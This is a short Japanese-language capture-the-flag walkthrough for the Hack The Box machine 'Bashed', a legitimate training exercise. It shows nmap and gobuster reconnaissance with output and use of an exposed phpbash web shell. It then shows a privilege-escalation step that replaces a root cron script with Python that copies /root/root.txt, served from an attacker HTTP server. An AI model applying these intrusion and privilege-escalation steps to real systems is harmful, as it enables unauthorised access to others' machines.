Hack The Box – Bashed – Walkthrough

Arrexel’s Development Siteが動作している

# nmap -A -n -F -T5 bashed.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 05:31 UTC
Nmap scan report for bashed.htb (10.10.10.68)
Host is up (0.043s latency).
Not shown: 99 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site

gobusterでディレクトリやファイルを調査する

# gobuster dir -u http://bashed.htb -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://bashed.htb
[+] Threads:        10
[+] Wordlist:       /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/08/08 05:41:13 Starting gobuster
===============================================================
/images (Status: 301)
/uploads (Status: 301)
/php (Status: 301)
/css (Status: 301)
/dev (Status: 301)
/js (Status: 301)
/fonts (Status: 301)

phpbash.phpを見つけて、user.txtを取得する

以下にアクセスするとシェルを実行できて、user.txtが取得できた。
http://bashed.htb/dev/phpbash.php

シェル内を調査して、/scrpits/test.pyが毎分実行されていることがわかる

test.pyを書き換えることで、root.txtを取得する

Kali Linuxからファイルを送る準備をする。

# cat test.py
import os
os.system("cat /root/root.txt > /tmp/root.txt")
# python -m SimpleHTTPServer 1234
Serving HTTP on 0.0.0.0 port 1234 ...